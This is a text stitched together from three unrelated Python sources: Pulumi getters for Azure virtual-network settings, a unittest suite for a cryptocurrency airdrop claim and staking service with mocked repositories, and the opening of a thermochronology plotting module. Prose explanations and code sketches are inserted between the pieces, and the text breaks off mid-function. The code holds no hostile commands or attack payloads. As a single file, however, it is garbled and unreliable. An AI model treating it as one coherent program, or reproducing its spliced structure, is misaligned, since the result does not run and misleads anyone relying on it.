@pulumi.getter(name="dnsServers")
def dns_servers(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
Gets or sets DHCPOptions that contains an array of DNS servers available to VMs
deployed in the virtual network.
"""
return pulumi.get(self, "dns_servers")
@dns_servers.setter
def dns_servers(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "dns_servers", value)
@property
@pulumi.getter(name="enableDdosProtection")
def enable_ddos_protection(self) -> Optional[pulumi.Input[bool]]:
"""
Gets or sets a value indicating whether
DDoS protection should be switched on.
"""
return pulumi.get(self, "enable_ddos_protection")
@enable_ddos_protection.setter
def enable_ddos_protection(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enable_ddos_protection", value)
@property
@pulumi.getter
def subnets(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['SubnetResourceSettingsArgs']]]]:
"""
Gets or sets the list of subnets in the virtual network.
"""
return pulumi.get(self, "subnets")
@subnets.setter
def subnets(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['SubnetResourceSettingsArgs']]]]):
pulumi.set(self, "subnets", value)
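The `@pulumi.getter(name=...)` decorators above map Python snake_case attributes to the camelCase keys the Azure API expects (`address_prefix` → `addressPrefix`, `network_security_group` → `networkSecurityGroup`, and so on). A hedged, stand-alone sketch of that naming conversion (`snake_to_camel` is a hypothetical helper, not the Pulumi SDK's own implementation):

```python
def snake_to_camel(name: str) -> str:
    # Keep the first segment lowercase, capitalize the rest:
    # "network_security_group" -> "networkSecurityGroup"
    head, *rest = name.split("_")
    return head + "".join(part.title() for part in rest)


assert snake_to_camel("address_prefix") == "addressPrefix"
assert snake_to_camel("network_security_group") == "networkSecurityGroup"
assert snake_to_camel("subnets") == "subnets"
```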
import unittest
from unittest import TestCase
from unittest.mock import Mock, patch
from airdrop.application.services.airdrop_services import AirdropServices
from http import HTTPStatus
from airdrop.constants import AirdropClaimStatus
from airdrop.infrastructure.repositories.airdrop_repository import AirdropRepository
from airdrop.infrastructure.models import AirdropWindow, Airdrop
from datetime import datetime, timedelta
from airdrop.application.services.user_registration_services import \
UserRegistrationServices
class AirdropClaims(TestCase):
airdrop_id = None
airdrop_window_id = None
def setUp(self):
org_name = 'SINGNET'
token_name = 'AGIX'
token_type = 'CONTRACT'
portal_link = 'https://ropsten-airdrop.singularitynet.io/'
documentation_link = 'https://ropsten-airdrop.singularitynet.io/'
description = 'This is a test airdrop'
github_link = 'https://github.com/singnet/airdrop-services'
registration_start_date = datetime.utcnow() - timedelta(days=2)
registration_end_date = datetime.utcnow() + timedelta(days=30)
claim_start_date = datetime.utcnow() - timedelta(days=2)
claim_end_date = datetime.utcnow() + timedelta(days=30)
contract_address = '0x5e94577b949a56279637ff74dfcff2c28408f049'
token_address = '0x5e94577b949a56279637ff74dfcff2c28408f049'
user_address = '0xEA674fdDe714fd979de3EdF0F56AA9716B898ec8'
token_name = 'AGIX'
occam_contract_address = '0x6e94577b949a56279637ff74dfcff2c28408f049'
occam_token_address = '0x5e93577b949a56279637ff74dfcff2c28408f049'
occam_user_address = '0xEA6741dDe714fd979de3EdF0F56AA9716B898ec8'
occam_token_name = 'AGIX'
airdrop_repository = AirdropRepository()
airdrop = airdrop_repository.register_airdrop(
token_address, org_name, token_name, token_type, contract_address, portal_link, documentation_link, description, github_link)
airdrop_windows = airdrop_repository.register_airdrop_window(airdrop_id=airdrop.id, airdrop_window_name='Airdrop Window 1', description='Long description', registration_required=True,
registration_start_period=registration_start_date, registration_end_period=registration_end_date, snapshot_required=True, claim_start_period=claim_start_date, claim_end_period=claim_end_date, total_airdrop_tokens=1000000)
global airdrop_id
airdrop_id = airdrop.id
global airdrop_window_id
airdrop_window_id = airdrop_windows.id
nunet_occam_airdrop = airdrop_repository.register_airdrop(
occam_token_address, org_name, token_name, token_type, contract_address, portal_link, documentation_link, description, github_link)
airdrop_repository.register_airdrop_window(airdrop_id=nunet_occam_airdrop.id, airdrop_window_name='Occam Window 1', description='Long description', registration_required=True,
registration_start_period=registration_start_date, registration_end_period=registration_end_date, snapshot_required=True, claim_start_period=claim_start_date, claim_end_period=claim_end_date, total_airdrop_tokens=1000000)
@patch('common.utils.recover_address')
@patch('airdrop.infrastructure.repositories.user_repository.UserRepository.check_rewards_awarded')
@patch('airdrop.application.services.airdrop_services.AirdropServices.get_signature_for_airdrop_window_id')
@patch('airdrop.infrastructure.repositories.airdrop_repository.AirdropRepository.get_airdrop_window_claimable_info')
@patch('airdrop.infrastructure.repositories.airdrop_repository.AirdropRepository.is_claimed_airdrop_window')
def test_get_signature_for_airdrop_window_claim(self, mock_is_claimed_airdrop_window, mock_get_airdrop_window_claimable_info, mock_get_signature_for_airdrop_window_id, mock_check_rewards_awarded, mock_recover_address):
address = '0xEA674fdDe714fd979de3EdF0F56AA9716B898ec8'
airdrop_claim_signature = '958449C28930970989dB5fFFbEdd9F44989d33a958B5fF989dB5f33a958F'
contract_address = '0x5e94577b949a56279637ff74dfcff2c28408f049'
token_address = '0x5e94577b949a56279637ff74dfcff2c28408f049'
staking_contract_address = '0x5e94577b949a56279637ff74dfcff2c28408f049'
mock_is_claimed_airdrop_window.return_value = {}
mock_check_rewards_awarded.return_value = True, 1000
mock_get_signature_for_airdrop_window_id.return_value = airdrop_claim_signature
mock_get_airdrop_window_claimable_info.return_value = 100, address, contract_address, token_address,\
staking_contract_address, 0
mock_recover_address.return_value = address
user_registration_payload = {
"airdrop_window_id": str(airdrop_window_id),
"airdrop_id": str(airdrop_id),
"address": address,
"signature": "958449C28930970989dB5fFFbEdd9F44989d33a958B5fF989dB5f33a958F",
}
UserRegistrationServices().register(user_registration_payload)
payload = {
"address": address,
"airdrop_id": str(airdrop_id),
"airdrop_window_id": str(airdrop_window_id)
}
expected_response = {'airdrop_id': str(airdrop_id), 'airdrop_window_id': str(airdrop_window_id),
'user_address': '0xEA674fdDe714fd979de3EdF0F56AA9716B898ec8',
'signature': '958449C28930970989dB5fFFbEdd9F44989d33a958B5fF989dB5f33a958F',
'claimable_amount': str(100),
'contract_address': '0x5e94577b949a56279637ff74dfcff2c28408f049',
'staking_contract_address': '0x5e94577b949a56279637ff74dfcff2c28408f049',
'token_address': '0x5e94577b949a56279637ff74dfcff2c28408f049',
'total_eligibility_amount': str(0)}
status_code, result = AirdropServices().airdrop_window_claims(payload)
self.assertEqual(expected_response, result)
def test_get_signature_for_airdrop_window_claim_with_invalid_windows(self):
payload = {
"address": "0x176133a958449C28930970989dB5fFFbEdd9F442",
"airdrop_id": airdrop_id,
"airdrop_window_id": airdrop_window_id
}
status_code, result = AirdropServices().airdrop_window_claims(payload)
self.assertNotEqual(status_code, HTTPStatus.OK)
def test_airdrop_window_claim_txn_status(self):
payload = {
"address": "0xEA674fdDe714fd979de3EdF0F56AA9716B898ec8",
"airdrop_id": airdrop_id,
"airdrop_window_id": airdrop_window_id,
"txn_status": "SUCCESS",
"txn_hash": "0xcb2ce8ea4749f58f0ea3cee7b5ed7686c67ccd1179dd526e080d6aa7fde69f70",
"amount": "100"
}
status_code, result = AirdropServices().airdrop_window_claim_status(payload)
self.assertEqual(status_code, HTTPStatus.BAD_REQUEST)
def test_airdrop_window_claim_duplicate_txn_status(self):
payload = {
"address": "0xEA674fdDe714fd979de3EdF0F56AA9716B898ec8",
"airdrop_id": "1",
"airdrop_window_id": "1",
"txn_status": "SUCCESS",
"txn_hash": "0xcb2ce8ea4749f58f0ea3cee7b5ed7686c67ccd1179dd526e080d6aa7fde69f70",
"amount": "100"
}
status_code, result = AirdropServices().airdrop_window_claim_status(payload)
self.assertEqual(status_code, HTTPStatus.BAD_REQUEST.value)
def test_airdrop_window_claim_history(self):
payload = {
"address": "0xEA674fdDe714fd979de3EdF0F56AA9716B898ec8",
"airdrop_id": "1"
}
status_code, result = AirdropServices().airdrop_window_claim_history(payload)
self.assertEqual(status_code, HTTPStatus.OK.value)
def test_airdrop_window_claim_history_for_address_without_claims(self):
payload = {
"address": "0x176133a958449C28930970989dB5fFFbEdd9F417",
"airdrop_id": "1",
"airdrop_window_id": "1"
}
status_code, result = AirdropServices().airdrop_window_claim_history(payload)
result_length = len(result['claim_history'])
self.assertEqual(result_length, 0)
def test_airdrop_event_consumer(self):
payload = {
"transactionHash": "0x176133a958449C28930970989dB5fFFbEdd9F417",
"json_str": "{'authorizer': '0xD93209FDC420e8298bDFA3dBe340F366Faf1E7bc', 'claimer': '0xEA674fdDe714fd979de3EdF0F56AA9716B898ec8', 'amount': 100, 'airDropId': 1, 'airDropWindowId': 1}",
"event": "Claim"
}
event = {"data": payload}
status, response = AirdropServices().airdrop_event_consumer(event)
self.assertEqual(status, HTTPStatus.OK)
self.assertEqual(response, {})
def test_airdrop_event_consumer_with_duplicate_data(self):
payload = {
"transactionHash": "0x176133a958449C28930970989dB5fFFbEdd9F417",
"json_str": "{'authorizer': '0xD93209FDC420e8298bDFA3dBe340F366Faf1E7bc', 'claimer': '0xEA674fdDe714fd979de3EdF0F56AA9716B898ec8', 'amount': 100, 'airDropId': 1, 'airDropWindowId': 1}",
"event": "Claim"
}
event = {"data": payload}
status, response = AirdropServices().airdrop_event_consumer(event)
self.assertNotEqual(response, False)
def test_airdrop_event_consumer_with_invalid_event(self):
payload = {
"transactionHash": "0x176133a958449C28930970989dB5fFFbEdd9F417",
"json_str": "{'conversionAuthorizer': '0xD93209FDC420e8298bDFA3dBe340F366Faf1E7bc'}",
"event": "NewAuthorizer"
}
event = {"data": payload}
status, response = AirdropServices().airdrop_event_consumer(event)
self.assertEqual(response, "Unsupported event")
@patch('airdrop.infrastructure.repositories.airdrop_repository.AirdropRepository.get_airdrop_window_claimable_info')
@patch('airdrop.application.services.airdrop_services.AirdropServices.get_stake_window_details')
@patch('airdrop.application.services.airdrop_services.AirdropServices.get_stake_details_of_address')
def test_get_airdrop_window_stake_details_by_sending_full_rewards_to_wallet_if_stake_window_is_not_open(self, mock_get_stake_details_of_address, mock_get_stake_window_details, mock_get_airdrop_window_claimable_info):
user_wallet_address = "0x46EF7d49aaA68B29C227442BDbD18356415f8304"
contract_address = '0x5e94577b949a56279637ff74dfcff2c28408f049'
token_address = '0x5e94577b949a56279637ff74dfcff2c28408f049'
staking_contract_address = '0x5e94577b949a56279637ff74dfcff2c28408f049'
is_stake_window_open = False
is_user_can_stake = True
window_max_stake = 100000
window_stake_amount = 200
max_stakable_amount = 10000
already_staked_amount = 0
airdrop_rewards = 20000
mock_get_stake_window_details.return_value = is_stake_window_open, max_stakable_amount, window_max_stake, window_stake_amount
mock_get_stake_details_of_address.return_value = is_user_can_stake, already_staked_amount
mock_get_airdrop_window_claimable_info.return_value = airdrop_rewards, user_wallet_address, \
contract_address, token_address, staking_contract_address,0
event = {
"address": user_wallet_address,
"airdrop_id": str(airdrop_id),
"airdrop_window_id": str(airdrop_window_id)
}
expected_result = {
"stake_details": {
"airdrop_id": str(airdrop_id),
"airdrop_window_id": str(airdrop_window_id),
"address": user_wallet_address,
"claimable_tokens_to_wallet": str(airdrop_rewards),
"stakable_tokens": str(0),
"is_stakable": False,
"token_name": "AGIX",
"airdrop_rewards": str(airdrop_rewards),
"total_eligible_amount": str(0)
}
}
status_code, response = AirdropServices().get_airdrop_window_stake_details(event)
self.assertEqual(response, expected_result)
self.assertEqual(status_code, HTTPStatus.OK.value)
@patch('airdrop.infrastructure.repositories.airdrop_repository.AirdropRepository.get_airdrop_window_claimable_info')
@patch('airdrop.application.services.airdrop_services.AirdropServices.get_stake_window_details')
@patch('airdrop.application.services.airdrop_services.AirdropServices.get_stake_details_of_address')
def test_get_airdrop_window_stake_details_by_sending_full_rewards_to_wallet_as_user_exceeded_the_stake_limit(self, mock_get_stake_details_of_address, mock_get_stake_window_details, mock_get_airdrop_window_claimable_info):
user_wallet_address = "0x46EF7d49aaA68B29C227442BDbD18356415f8304"
contract_address = '0x5e94577b949a56279637ff74dfcff2c28408f049'
token_address = '0x5e94577b949a56279637ff74dfcff2c28408f049'
staking_contract_address = '0x5e94577b949a56279637ff74dfcff2c28408f049'
is_stake_window_open = True
is_user_can_stake = True
window_max_stake = 100000
window_stake_amount = 200
max_stakable_amount = 10000
already_staked_amount = max_stakable_amount
airdrop_rewards = 20000
mock_get_stake_window_details.return_value = is_stake_window_open, max_stakable_amount, window_max_stake, window_stake_amount
mock_get_stake_details_of_address.return_value = is_user_can_stake, already_staked_amount
mock_get_airdrop_window_claimable_info.return_value = airdrop_rewards, user_wallet_address, contract_address, token_address, staking_contract_address, 0
event = {
"address": user_wallet_address,
"airdrop_id": str(airdrop_id),
"airdrop_window_id": str(airdrop_window_id)
}
expected_result = {
"stake_details": {
"airdrop_id": str(airdrop_id),
"airdrop_window_id": str(airdrop_window_id),
"address": user_wallet_address,
"claimable_tokens_to_wallet": str(airdrop_rewards),
"stakable_tokens": str(0),
"is_stakable": False,
"token_name": "AGIX",
"airdrop_rewards": str(airdrop_rewards),
"total_eligible_amount": str(0)
}
}
status_code, response = AirdropServices().get_airdrop_window_stake_details(event)
self.assertEqual(response, expected_result)
self.assertEqual(status_code, HTTPStatus.OK.value)
@patch('airdrop.infrastructure.repositories.airdrop_repository.AirdropRepository.get_airdrop_window_claimable_info')
@patch('airdrop.application.services.airdrop_services.AirdropServices.get_stake_window_details')
@patch('airdrop.application.services.airdrop_services.AirdropServices.get_stake_details_of_address')
def test_get_airdrop_window_stake_details_by_partially_stake_and_claim(self, mock_get_stake_details_of_address, mock_get_stake_window_details, mock_get_airdrop_window_claimable_info):
user_wallet_address = "0x46EF7d49aaA68B29C227442BDbD18356415f8304"
contract_address = '0x5e94577b949a56279637ff74dfcff2c28408f049'
token_address = '0x5e94577b949a56279637ff74dfcff2c28408f049'
staking_contract_address = '0x5e94577b949a56279637ff74dfcff2c28408f049'
is_stake_window_open = True
is_user_can_stake = True
window_max_stake = 100000
window_stake_amount = 200
max_stakable_amount = 10000
already_staked_amount = 5000
airdrop_rewards = 10000
mock_get_stake_window_details.return_value = is_stake_window_open, max_stakable_amount, window_max_stake, window_stake_amount
mock_get_stake_details_of_address.return_value = is_user_can_stake, already_staked_amount
mock_get_airdrop_window_claimable_info.return_value = airdrop_rewards, user_wallet_address, contract_address, token_address, staking_contract_address, 0
event = {
"address": user_wallet_address,
"airdrop_id": str(airdrop_id),
"airdrop_window_id": str(airdrop_window_id)
}
expected_result = {
"stake_details": {
"airdrop_id": str(airdrop_id),
"airdrop_window_id": str(airdrop_window_id),
"address": user_wallet_address,
"claimable_tokens_to_wallet": str(5000),
"stakable_tokens": str(5000),
"is_stakable": True,
"token_name": "AGIX",
"airdrop_rewards": str(airdrop_rewards),
"total_eligible_amount": str(0)
}
}
status_code, response = AirdropServices().get_airdrop_window_stake_details(event)
self.assertEqual(response, expected_result)
self.assertEqual(status_code, HTTPStatus.OK.value)
@patch('airdrop.infrastructure.repositories.airdrop_repository.AirdropRepository.get_airdrop_window_claimable_info')
@patch('airdrop.application.services.airdrop_services.AirdropServices.get_stake_window_details')
@patch('airdrop.application.services.airdrop_services.AirdropServices.get_stake_details_of_address')
def test_get_airdrop_window_stake_details_by_full_rewards_staked(self, mock_get_stake_details_of_address, mock_get_stake_window_details, mock_get_airdrop_window_claimable_info):
user_wallet_address = "0x46EF7d49aaA68B29C227442BDbD18356415f8304"
contract_address = '0x5e94577b949a56279637ff74dfcff2c28408f049'
token_address = '0x5e94577b949a56279637ff74dfcff2c28408f049'
staking_contract_address = '0x5e94577b949a56279637ff74dfcff2c28408f049'
is_stake_window_open = True
is_user_can_stake = True
window_max_stake = 100000
window_stake_amount = 200
max_stakable_amount = 10000
already_staked_amount = 0
airdrop_rewards = 10000
mock_get_stake_window_details.return_value = is_stake_window_open, max_stakable_amount, window_max_stake, \
window_stake_amount
mock_get_stake_details_of_address.return_value = is_user_can_stake, already_staked_amount
mock_get_airdrop_window_claimable_info.return_value = airdrop_rewards, user_wallet_address, \
contract_address, token_address, staking_contract_address, airdrop_rewards
event = {
"address": user_wallet_address,
"airdrop_id": str(airdrop_id),
"airdrop_window_id": str(airdrop_window_id)
}
expected_result = {
"stake_details": {
"airdrop_id": str(airdrop_id),
"airdrop_window_id": str(airdrop_window_id),
"address": user_wallet_address,
"claimable_tokens_to_wallet": "0",
"stakable_tokens": str(airdrop_rewards),
"is_stakable": True,
"token_name": "AGIX",
"airdrop_rewards": str(airdrop_rewards),
"total_eligible_amount":str(airdrop_rewards)
}
}
status_code, response = AirdropServices().get_airdrop_window_stake_details(event)
self.assertEqual(response, expected_result)
self.assertEqual(status_code, HTTPStatus.OK.value)
@patch('airdrop.infrastructure.repositories.airdrop_repository.AirdropRepository.get_airdrop_window_claimable_info')
@patch('airdrop.application.services.airdrop_services.AirdropServices.get_stake_window_details')
@patch('airdrop.application.services.airdrop_services.AirdropServices.get_stake_details_of_address')
def test_get_airdrop_window_stake_details_if_airdrop_rewards_greater_than_max_stake_amount(self, mock_get_stake_details_of_address, mock_get_stake_window_details, mock_get_airdrop_window_claimable_info):
user_wallet_address = "0x46EF7d49aaA68B29C227442BDbD18356415f8304"
contract_address = '0x5e94577b949a56279637ff74dfcff2c28408f049'
token_address = '0x5e94577b949a56279637ff74dfcff2c28408f049'
staking_contract_address = '0x5e94577b949a56279637ff74dfcff2c28408f049'
is_stake_window_open = True
is_user_can_stake = True
window_max_stake = 100000
window_stake_amount = 200
max_stakable_amount = 10000
already_staked_amount = 0
airdrop_rewards = 50000
mock_get_stake_window_details.return_value = is_stake_window_open, max_stakable_amount, window_max_stake, window_stake_amount
mock_get_stake_details_of_address.return_value = is_user_can_stake, already_staked_amount
mock_get_airdrop_window_claimable_info.return_value = airdrop_rewards, user_wallet_address, contract_address, token_address, staking_contract_address, airdrop_rewards
event = {
"address": user_wallet_address,
"airdrop_id": str(airdrop_id),
"airdrop_window_id": str(airdrop_window_id)
}
expected_result = {
"stake_details": {
"airdrop_id": str(airdrop_id),
"airdrop_window_id": str(airdrop_window_id),
"address": user_wallet_address,
"claimable_tokens_to_wallet": str(40000),
"stakable_tokens": str(10000),
"is_stakable": True,
"token_name": "AGIX",
"airdrop_rewards": str(airdrop_rewards),
"total_eligible_amount": str(airdrop_rewards)
}
}
status_code, response = AirdropServices().get_airdrop_window_stake_details(event)
self.assertEqual(response, expected_result)
self.assertEqual(status_code, HTTPStatus.OK.value)
@patch('airdrop.infrastructure.repositories.airdrop_repository.AirdropRepository.get_airdrop_window_claimable_info')
@patch('airdrop.application.services.airdrop_services.AirdropServices.get_stake_window_details')
@patch('airdrop.application.services.airdrop_services.AirdropServices.get_stake_details_of_address')
def test_get_airdrop_window_stake_details_user_can_stake_who_has_not_staked(self, mock_get_stake_details_of_address, mock_get_stake_window_details, mock_get_airdrop_window_claimable_info):
user_wallet_address = "0x46EF7d49aaA68B29C227442BDbD18356415f8304"
contract_address = '0x5e94577b949a56279637ff74dfcff2c28408f049'
token_address = '0x5e94577b949a56279637ff74dfcff2c28408f049'
staking_contract_address = '0x5e94577b949a56279637ff74dfcff2c28408f049'
is_stake_window_open = True
is_already_staked_user = False
window_max_stake = 100000
window_stake_amount = 200
max_stakable_amount = 10000
already_staked_amount = 0
airdrop_rewards = 10000
mock_get_stake_window_details.return_value = is_stake_window_open, max_stakable_amount, window_max_stake, window_stake_amount
mock_get_stake_details_of_address.return_value = is_already_staked_user, already_staked_amount
mock_get_airdrop_window_claimable_info.return_value = airdrop_rewards, user_wallet_address, contract_address, \
token_address, staking_contract_address, 0
event = {
"address": user_wallet_address,
"airdrop_id": str(airdrop_id),
"airdrop_window_id": str(airdrop_window_id)
}
expected_result = {
"stake_details": {
"airdrop_id": str(airdrop_id),
"airdrop_window_id": str(airdrop_window_id),
"address": user_wallet_address,
"claimable_tokens_to_wallet": str(0),
"stakable_tokens": str(10000),
"is_stakable": True,
"token_name": "AGIX",
"airdrop_rewards": str(airdrop_rewards),
"total_eligible_amount": str(0)
}
}
status_code, response = AirdropServices().get_airdrop_window_stake_details(event)
self.assertEqual(response, expected_result)
self.assertEqual(status_code, HTTPStatus.OK.value)
@patch('airdrop.infrastructure.repositories.airdrop_repository.AirdropRepository.get_airdrop_window_claimable_info')
@patch('airdrop.application.services.airdrop_services.AirdropServices.get_stake_window_details')
@patch('airdrop.application.services.airdrop_services.AirdropServices.get_stake_details_of_address')
def test_get_airdrop_window_stake_details_if_user_staked_max_amount_then_is_stakable_should_false(self, mock_get_stake_details_of_address, mock_get_stake_window_details, mock_get_airdrop_window_claimable_info):
user_wallet_address = "0x46EF7d49aaA68B29C227442BDbD18356415f8304"
contract_address = '0x5e94577b949a56279637ff74dfcff2c28408f049'
token_address = '0x5e94577b949a56279637ff74dfcff2c28408f049'
staking_contract_address = '0x5e94577b949a56279637ff74dfcff2c28408f049'
is_stake_window_open = True
is_already_staked_user = True
window_max_stake = 100000
window_stake_amount = 200
max_stakable_amount = 10000
already_staked_amount = 10000
airdrop_rewards = 1000
mock_get_stake_window_details.return_value = is_stake_window_open, max_stakable_amount, window_max_stake, window_stake_amount
mock_get_stake_details_of_address.return_value = is_already_staked_user, already_staked_amount
mock_get_airdrop_window_claimable_info.return_value = airdrop_rewards, user_wallet_address, contract_address, \
token_address, staking_contract_address, 0
event = {
"address": user_wallet_address,
"airdrop_id": str(airdrop_id),
"airdrop_window_id": str(airdrop_window_id)
}
expected_result = {
"stake_details": {
"airdrop_id": str(airdrop_id),
"airdrop_window_id": str(airdrop_window_id),
"address": user_wallet_address,
"claimable_tokens_to_wallet": str(airdrop_rewards),
"stakable_tokens": str(0),
"is_stakable": False,
"token_name": "AGIX",
"airdrop_rewards": str(airdrop_rewards),
"total_eligible_amount": str(0)
}
}
status_code, response = AirdropServices().get_airdrop_window_stake_details(event)
self.assertEqual(response, expected_result)
self.assertEqual(status_code, HTTPStatus.OK.value)
@patch('airdrop.infrastructure.repositories.airdrop_repository.AirdropRepository.get_airdrop_window_claimable_info')
@patch('airdrop.application.services.airdrop_services.AirdropServices.get_stake_window_details')
@patch('airdrop.application.services.airdrop_services.AirdropServices.get_stake_details_of_address')
def test_get_airdrop_window_stake_details_on_window_limit(self, mock_get_stake_details_of_address, mock_get_stake_window_details, mock_get_airdrop_window_claimable_info):
user_wallet_address = "0x46EF7d49aaA68B29C227442BDbD18356415f8304"
contract_address = '0x5e94577b949a56279637ff74dfcff2c28408f049'
token_address = '0x5e94577b949a56279637ff74dfcff2c28408f049'
staking_contract_address = '0x5e94577b949a56279637ff74dfcff2c28408f049'
is_stake_window_open = True
is_user_can_stake = True
window_max_stake = 10
window_stake_amount = 9
# => only 1 can be staked by any user
max_stakable_amount = 5
already_staked_amount = 1
airdrop_rewards = 4
# => ideally user can stake 4 if others had not staked,
# but since the window has been filled by other users, this user can stake NOW only 1
mock_get_stake_window_details.return_value = is_stake_window_open, max_stakable_amount, window_max_stake, \
window_stake_amount
mock_get_stake_details_of_address.return_value = is_user_can_stake, already_staked_amount
mock_get_airdrop_window_claimable_info.return_value = airdrop_rewards, user_wallet_address, \
contract_address, token_address, staking_contract_address, airdrop_rewards
event = {
"address": user_wallet_address,
"airdrop_id": str(airdrop_id),
"airdrop_window_id": str(airdrop_window_id)
}
expected_result = {
"stake_details": {
"airdrop_id": str(airdrop_id),
"airdrop_window_id": str(airdrop_window_id),
"address": user_wallet_address,
"claimable_tokens_to_wallet": str(airdrop_rewards - min((window_max_stake - window_stake_amount),(max_stakable_amount-already_staked_amount))),
"stakable_tokens": str(window_max_stake - window_stake_amount),
"is_stakable": True,
"token_name": "AGIX",
"airdrop_rewards": str(airdrop_rewards),
"total_eligible_amount":str(airdrop_rewards)
}
}
status_code, response = AirdropServices().get_airdrop_window_stake_details(event)
self.assertEqual(response, expected_result)
self.assertEqual(status_code, HTTPStatus.OK.value)
@patch('airdrop.infrastructure.repositories.airdrop_repository.AirdropRepository.get_airdrop_window_claimable_info')
@patch('airdrop.application.services.airdrop_services.AirdropServices.get_stake_window_details')
@patch('airdrop.application.services.airdrop_services.AirdropServices.get_stake_details_of_address')
def test_get_airdrop_for_erroneous_stake_window(self, mock_get_stake_details_of_address,
mock_get_stake_window_details,
mock_get_airdrop_window_claimable_info):
user_wallet_address = "0x46EF7d49aaA68B29C227442BDbD18356415f8304"
contract_address = '0x5e94577b949a56279637ff74dfcff2c28408f049'
token_address = '0x5e94577b949a56279637ff74dfcff2c28408f049'
staking_contract_address = '0x5e94577b949a56279637ff74dfcff2c28408f049'
is_stake_window_open = True
is_user_can_stake = True
window_max_stake = 10
window_stake_amount = 9
# => only 1 can be staked by any user
max_stakable_amount = 5
# The amount already staked by this user exceeds the maximum limits
already_staked_amount = 13
airdrop_rewards = 4
# => although the window still has capacity, this user has already exceeded
# the per-user staking limit, so no further staking is possible
mock_get_stake_window_details.return_value = is_stake_window_open, max_stakable_amount, window_max_stake, \
window_stake_amount
mock_get_stake_details_of_address.return_value = is_user_can_stake, already_staked_amount
mock_get_airdrop_window_claimable_info.return_value = airdrop_rewards, user_wallet_address, \
contract_address, token_address, staking_contract_address, \
airdrop_rewards
event = {
"address": user_wallet_address,
"airdrop_id": str(airdrop_id),
"airdrop_window_id": str(airdrop_window_id)
}
expected_result = {
"stake_details": {
"airdrop_id": str(airdrop_id),
"airdrop_window_id": str(airdrop_window_id),
"address": user_wallet_address,
"claimable_tokens_to_wallet": str(airdrop_rewards),
"stakable_tokens": str(0),
"is_stakable": False,
"token_name": "AGIX",
"airdrop_rewards": str(airdrop_rewards),
"total_eligible_amount": str(airdrop_rewards)
}
}
status_code, response = AirdropServices().get_airdrop_window_stake_details(event)
self.assertEqual(response, expected_result)
self.assertEqual(status_code, HTTPStatus.OK.value)
def test_airdrop_txn_watcher(self):
response = AirdropServices().airdrop_txn_watcher()
self.assertIsNone(response)
# Import libraries we need
import matplotlib.pyplot as plt
from matplotlib.ticker import ScalarFormatter
import numpy as np
import os
from pathlib import Path
from scipy.interpolate import interp1d
import shutil
import subprocess
# Define function for calculating effective uranium concentration
def calc_eu(uranium, thorium):
"""Calculates effective uranium concentration from U, Th inputs"""
return uranium + 0.238 * thorium
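A quick sanity check of the eU formula above (concentrations hypothetical): effective uranium weights thorium by its relative alpha productivity, using the factor 0.238.

```python
# Effective uranium: eU = U + 0.238 * Th (concentrations in ppm).
def calc_eu(uranium, thorium):
    """Calculates effective uranium concentration from U, Th inputs"""
    return uranium + 0.238 * thorium

# Hypothetical apatite grain with 100 ppm U and 40 ppm Th:
print(round(calc_eu(100.0, 40.0), 2))  # 109.52
```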
# Define function to find the location of the RDAAM_He/ketch_aft executable
def get_tc_exec(command):
"""Returns the location of the RDAAM_He or ketch_aft executable"""
if shutil.which(command) is not None:
tc_exec = command
elif Path("bin/" + command).is_file():
tc_exec = "bin/" + command
else:
raise FileNotFoundError(
f"Age calculation program {command} not found. See Troubleshooting in tcplotter docs online."
)
return tc_exec
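The executable located here is later invoked with a time-temperature file plus apatite and zircon grain parameters (see the command built in eu_vs_radius). The long string concatenation used there can be sketched more compactly; all numeric values below are hypothetical grain parameters, not values from this module.

```python
# Sketch: assembling the RDAAM_He command line used by the plotting functions.
# Order: executable, tT file, apatite radius/U/Th, zircon radius/U/Th.
rdaam_command = "RDAAM_He"
tt_file = "simple_time_temp.txt"
params = [rdaam_command, tt_file, 60.0, 10.0, 0.0, 60.0, 100.0, 0.0]
command = " ".join(str(p) for p in params)
print(command)  # RDAAM_He simple_time_temp.txt 60.0 10.0 0.0 60.0 100.0 0.0
```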
# Define function for creating plot of cooling rates
def time_vs_temp(
cooling_rate_min=0.1,
cooling_rate_slow=1.0,
cooling_rate_avg=10.0,
cooling_rate_max=100.0,
temp_max=350.0,
time_max=50.0,
save_plot=False,
plot_file_format="pdf",
plot_dpi=300,
plot_style="seaborn-whitegrid",
fill_between=True,
display_plot=True,
):
"""
Plots cooling rate lines for different input rates.
Parameters
----------
cooling_rate_min : float or int, default=0.1
Minimum cooling rate to plot in degrees C / Myr.
cooling_rate_slow : float or int, default=1.0
"Slow" cooling rate to plot in degrees C / Myr.
cooling_rate_avg : float or int, default=10.0
"Average" cooling rate to plot in degrees C / Myr.
cooling_rate_max : float or int, default=100.0
Maximum cooling rate to plot in degrees C / Myr.
temp_max : float or int, default=350.0
Maximum temperature for cooling history in degrees C.
time_max : float or int, default=50.0
Maximum value for time on x-axis of plot in millions of years ago (Ma).
save_plot : bool, default=False
Flag for whether to save the plot to a file.
plot_file_format : str, default='pdf'
File format for saving plot to file (examples: png, pdf, svg, eps).
plot_dpi : int, default=300
Saved plot resolution in dots per inch.
plot_style : str, default='seaborn-whitegrid'
Style sheet used for plotting. See https://matplotlib.org/stable/gallery/style_sheets/style_sheets_reference.html.
fill_between : bool, default=True
Flag for whether to fill area between min, max cooling rates.
display_plot : bool, default=True
Flag for whether to display the plot.
Returns
-------
None
"""
# Ensure relative paths work by setting working dir to dir containing this script file
wd_orig = os.getcwd()
script_path = os.path.abspath(__file__)
dir_name = os.path.dirname(script_path)
os.chdir(dir_name)
# Find time and temperature bounds for plot
time_plot_min = min(time_max, temp_max / cooling_rate_min)
temp_plot_min = min(temp_max, cooling_rate_min * time_plot_min)
time_plot_slow = min(time_max, temp_max / cooling_rate_slow)
temp_plot_slow = min(temp_max, cooling_rate_slow * time_plot_slow)
time_plot_avg = min(time_max, temp_max / cooling_rate_avg)
temp_plot_avg = min(temp_max, cooling_rate_avg * time_plot_avg)
time_plot_max = min(time_max, temp_max / cooling_rate_max)
temp_plot_max = min(temp_max, cooling_rate_max * time_plot_max)
# Create arrays of points to plot
min_rate_x = np.array([time_plot_min, 0.0])
min_rate_y = np.array([temp_plot_min, 0.0])
slow_rate_x = np.array([time_plot_slow, 0.0])
slow_rate_y = np.array([temp_plot_slow, 0.0])
avg_rate_x = np.array([time_plot_avg, 0.0])
